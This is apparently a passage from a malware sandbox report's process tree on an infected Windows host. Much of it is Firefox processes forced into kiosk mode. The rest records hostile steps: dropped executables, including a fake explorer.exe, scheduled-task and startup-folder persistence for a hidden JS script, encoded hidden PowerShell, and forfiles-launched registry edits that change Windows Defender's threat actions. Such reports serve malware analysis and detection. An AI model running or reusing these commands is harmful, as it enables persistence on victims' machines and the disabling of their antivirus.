                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1972.3.1253159808\1631505620" -childID 2 -isForBrowser -prefsHandle 2708 -prefMapHandle 2704 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 572 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {30530211-80a6-4e7f-a715-d0a96bcfc938} 1972 "\\.\pipe\gecko-crash-server-pipe.1972" 2720 1b440a58 tab
                                                      7⤵
                                                        PID:2888
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1972.4.562839673\1575618602" -childID 3 -isForBrowser -prefsHandle 3888 -prefMapHandle 3884 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 572 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {39d6be45-c68f-416e-b5d3-0a10c7bb0ef4} 1972 "\\.\pipe\gecko-crash-server-pipe.1972" 3900 e2ff58 tab
                                                        7⤵
                                                          PID:3796
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1972.5.1110287067\441094574" -childID 4 -isForBrowser -prefsHandle 4008 -prefMapHandle 4012 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 572 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5cdf4976-b90a-4b14-be84-457a5f3dd43a} 1972 "\\.\pipe\gecko-crash-server-pipe.1972" 3996 20c9a958 tab
                                                          7⤵
                                                            PID:3804
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1972.6.712779421\1233735747" -childID 5 -isForBrowser -prefsHandle 4196 -prefMapHandle 4200 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 572 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fa8db8aa-901e-4663-b676-42e92ae30bde} 1972 "\\.\pipe\gecko-crash-server-pipe.1972" 4184 20c9b558 tab
                                                            7⤵
                                                              PID:3812
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                          5⤵
                                                            PID:1028
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                              6⤵
                                                                PID:2772
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                              5⤵
                                                                PID:3704
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                  6⤵
                                                                  • Checks processor information in registry
                                                                  • Modifies registry class
                                                                  PID:3608
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3608.0.278293\92237069" -parentBuildID 20221007134813 -prefsHandle 1192 -prefMapHandle 1184 -prefsLen 21788 -prefMapSize 233836 -appDir "C:\Program Files\Mozilla Firefox\browser" - {48277d7e-ecd6-462c-9404-f72202c256f0} 3608 "\\.\pipe\gecko-crash-server-pipe.3608" 1292 132f4e58 gpu
                                                                    7⤵
                                                                      PID:3296
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3608.1.1618939530\1953790585" -parentBuildID 20221007134813 -prefsHandle 1464 -prefMapHandle 1460 -prefsLen 22649 -prefMapSize 233836 -appDir "C:\Program Files\Mozilla Firefox\browser" - {47ad34b6-7e45-49e5-a3f9-cbc26f29755c} 3608 "\\.\pipe\gecko-crash-server-pipe.3608" 1476 e72558 socket
                                                                      7⤵
                                                                        PID:2028
                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3608.2.691105447\356790353" -childID 1 -isForBrowser -prefsHandle 2016 -prefMapHandle 2072 -prefsLen 22752 -prefMapSize 233836 -jsInitHandle 884 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ea59286-6d9e-4b74-a89b-6e73451f062e} 3608 "\\.\pipe\gecko-crash-server-pipe.3608" 1796 1a084158 tab
                                                                        7⤵
                                                                          PID:3732
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3608.3.1043247582\680002485" -childID 2 -isForBrowser -prefsHandle 2616 -prefMapHandle 2612 -prefsLen 27100 -prefMapSize 233836 -jsInitHandle 884 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c46366bf-10bb-4570-9e11-bac884bdc332} 3608 "\\.\pipe\gecko-crash-server-pipe.3608" 2628 e5b258 tab
                                                                          7⤵
                                                                            PID:3168
                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3608.4.1884115087\803594708" -childID 3 -isForBrowser -prefsHandle 3476 -prefMapHandle 3392 -prefsLen 27100 -prefMapSize 233836 -jsInitHandle 884 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bc5b5d97-4035-45b8-841d-e9a1b8e97640} 3608 "\\.\pipe\gecko-crash-server-pipe.3608" 3488 1fbdd558 tab
                                                                            7⤵
                                                                              PID:2428
                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3608.5.1575684580\761085896" -childID 4 -isForBrowser -prefsHandle 3596 -prefMapHandle 3600 -prefsLen 27100 -prefMapSize 233836 -jsInitHandle 884 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4227474f-7e87-4d5f-aa81-87bce0afd2b1} 3608 "\\.\pipe\gecko-crash-server-pipe.3608" 3616 1fbddb58 tab
                                                                              7⤵
                                                                                PID:2004
                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3608.6.674313166\1585647860" -childID 5 -isForBrowser -prefsHandle 3760 -prefMapHandle 3764 -prefsLen 27100 -prefMapSize 233836 -jsInitHandle 884 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a59277d4-0482-4030-a678-36cbf1d9ad99} 3608 "\\.\pipe\gecko-crash-server-pipe.3608" 3748 1fbde458 tab
                                                                                7⤵
                                                                                  PID:1276
                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                              5⤵
                                                                                PID:1552
                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                                                  6⤵
                                                                                    PID:3984
                                                                              • C:\Users\Admin\AppData\Local\Temp\1000310001\shopfree.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\1000310001\shopfree.exe"
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                PID:2116
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                                                            2⤵
                                                                              PID:768
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                                                                3⤵
                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                PID:1664
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & echo URL="C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & exit
                                                                              2⤵
                                                                              • Drops startup file
                                                                              PID:2352
                                                                          • C:\Windows\system32\taskeng.exe
                                                                            taskeng.exe {442F6F11-0F4A-4D2B-BC70-283EFA575C81} S-1-5-21-1506706701-1246725540-2219210854-1000:MUYDDIIS\Admin:Interactive:[1]
                                                                            1⤵
                                                                              PID:1980
                                                                              • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                PID:3976
                                                                              • C:\ProgramData\explorer.exe
                                                                                C:\ProgramData\explorer.exe
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:3500
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                2⤵
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                • Drops file in System32 directory
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:3596
                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                  3⤵
                                                                                    PID:3724
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                  2⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • Drops file in System32 directory
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2872
                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                    3⤵
                                                                                      PID:3968
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                    2⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Drops file in System32 directory
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:3048
                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                      3⤵
                                                                                        PID:3536
                                                                                    • C:\ProgramData\explorer.exe
                                                                                      C:\ProgramData\explorer.exe
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:2052
                                                                                    • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      PID:3716
                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                      2⤵
                                                                                        PID:2408
                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                          3⤵
                                                                                          • Checks processor information in registry
                                                                                          • Modifies registry class
                                                                                          PID:552
                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="552.0.821798707\1479436616" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1212 -prefsLen 21972 -prefMapSize 234060 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9590ac6c-6922-44e9-853b-60738fcc7210} 552 "\\.\pipe\gecko-crash-server-pipe.552" 1284 13b85f58 gpu
                                                                                            4⤵
                                                                                              PID:2088
                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="552.1.1866361023\978048849" -parentBuildID 20221007134813 -prefsHandle 1460 -prefMapHandle 1456 -prefsLen 22053 -prefMapSize 234060 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0fea081e-2810-405b-aff6-b54406ce58f1} 552 "\\.\pipe\gecko-crash-server-pipe.552" 1472 fdd4158 socket
                                                                                              4⤵
                                                                                                PID:2772
                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="552.2.1191250362\693081793" -childID 1 -isForBrowser -prefsHandle 2016 -prefMapHandle 1856 -prefsLen 22156 -prefMapSize 234060 -jsInitHandle 872 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {dd8f368c-0937-45f3-9bdb-bd198bd85649} 552 "\\.\pipe\gecko-crash-server-pipe.552" 1824 1a4c1f58 tab
                                                                                                4⤵
                                                                                                  PID:3696
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="552.3.2054000418\1457223009" -childID 2 -isForBrowser -prefsHandle 2504 -prefMapHandle 2500 -prefsLen 26505 -prefMapSize 234060 -jsInitHandle 872 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {41b511cb-c54e-43dd-8365-557c935cbda9} 552 "\\.\pipe\gecko-crash-server-pipe.552" 2516 1d415a58 tab
                                                                                                  4⤵
                                                                                                    PID:2260
                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="552.4.1875939975\247013804" -childID 3 -isForBrowser -prefsHandle 3056 -prefMapHandle 3048 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 872 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e9a8477-e9c1-4f7a-8237-56d449baacb8} 552 "\\.\pipe\gecko-crash-server-pipe.552" 3064 1fb66258 tab
                                                                                                    4⤵
                                                                                                      PID:2404
                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="552.5.1528058977\1192811503" -childID 4 -isForBrowser -prefsHandle 3088 -prefMapHandle 3344 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 872 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {68e7fbaf-5529-4308-af71-8e4bcd35be32} 552 "\\.\pipe\gecko-crash-server-pipe.552" 3348 1efec558 tab
                                                                                                      4⤵
                                                                                                        PID:3920
                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="552.6.1447415562\1363508041" -childID 5 -isForBrowser -prefsHandle 3896 -prefMapHandle 3892 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 872 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f15fcf8-3da4-4533-b68d-e6cb97e5fd43} 552 "\\.\pipe\gecko-crash-server-pipe.552" 3908 224e8458 tab
                                                                                                        4⤵
                                                                                                          PID:2908
                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="552.7.1414069620\301106199" -childID 6 -isForBrowser -prefsHandle 4028 -prefMapHandle 4032 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 872 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0420feb8-4c3d-45bb-9a70-a5c6a1e3c973} 552 "\\.\pipe\gecko-crash-server-pipe.552" 4048 224e8d58 tab
                                                                                                          4⤵
                                                                                                            PID:3864
                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="552.8.486452585\1280091484" -childID 7 -isForBrowser -prefsHandle 4228 -prefMapHandle 4232 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 872 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b58fdbe-9bbd-434e-9747-0d54751855f5} 552 "\\.\pipe\gecko-crash-server-pipe.552" 4108 2290a658 tab
                                                                                                            4⤵
                                                                                                              PID:3068
                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="552.9.1380523216\1754965470" -childID 8 -isForBrowser -prefsHandle 4332 -prefMapHandle 4336 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 872 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f04565c1-66ab-4b2e-9d74-6cd46288cb7a} 552 "\\.\pipe\gecko-crash-server-pipe.552" 4068 20a34258 tab
                                                                                                              4⤵
                                                                                                                PID:3552
                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="552.10.1270659145\815668387" -childID 9 -isForBrowser -prefsHandle 4168 -prefMapHandle 4112 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 872 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {150a3fc4-7be0-408b-b99f-97b2009d487d} 552 "\\.\pipe\gecko-crash-server-pipe.552" 4164 224e8458 tab
                                                                                                                4⤵
                                                                                                                  PID:996
                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="552.11.1130209851\1456457965" -childID 10 -isForBrowser -prefsHandle 3996 -prefMapHandle 3984 -prefsLen 27313 -prefMapSize 234060 -jsInitHandle 872 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b98147e9-1ef8-4a61-8fde-810b009ee778} 552 "\\.\pipe\gecko-crash-server-pipe.552" 4164 22908258 tab
                                                                                                                  4⤵
                                                                                                                    PID:2536
                                                                                                              • C:\ProgramData\explorer.exe
                                                                                                                C:\ProgramData\explorer.exe
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:1236
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3692
                                                                                                              • C:\ProgramData\explorer.exe
                                                                                                                C:\ProgramData\explorer.exe
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:3056
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:1784
                                                                                                            • C:\Windows\system32\taskeng.exe
                                                                                                              taskeng.exe {8E785F76-CC45-4657-BA50-7E58FBE406A6} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                              1⤵
                                                                                                                PID:3856
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\jsMCGFl.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\jsMCGFl.exe PV /DcTPdidOTFD 385121 /S
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  PID:2608
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                    3⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:3068
                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                      4⤵
                                                                                                                      • Indirect Command Execution
                                                                                                                      PID:3632
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                        5⤵
                                                                                                                          PID:2804
                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                            6⤵
                                                                                                                              PID:1576
                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                          4⤵
                                                                                                                          • Indirect Command Execution
                                                                                                                          PID:864
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                            5⤵
                                                                                                                              PID:1268
                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                6⤵
                                                                                                                                  PID:2872
                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                              4⤵
                                                                                                                              • Indirect Command Execution
                                                                                                                              PID:1244
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                5⤵
                                                                                                                                  PID:2208
                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                    6⤵
                                                                                                                                      PID:1872
                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                  4⤵
                                                                                                                                  • Indirect Command Execution
                                                                                                                                  PID:560
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                    5⤵
                                                                                                                                      PID:2232
                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                        6⤵
                                                                                                                                          PID:3648
                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                      4⤵
                                                                                                                                      • Indirect Command Execution
                                                                                                                                      PID:2620
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                        5⤵
                                                                                                                                          PID:1452
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                            6⤵
                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                            • Drops file in System32 directory
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:3576
                                                                                                                                            • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                              7⤵
                                                                                                                                                PID:1644
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /CREATE /TN "gWdWnFEKd" /SC once /ST 04:56:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                        3⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:2340
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /run /I /tn "gWdWnFEKd"
                                                                                                                                        3⤵
                                                                                                                                          PID:3572
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /DELETE /F /TN "gWdWnFEKd"
                                                                                                                                          3⤵
                                                                                                                                            PID:2264
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
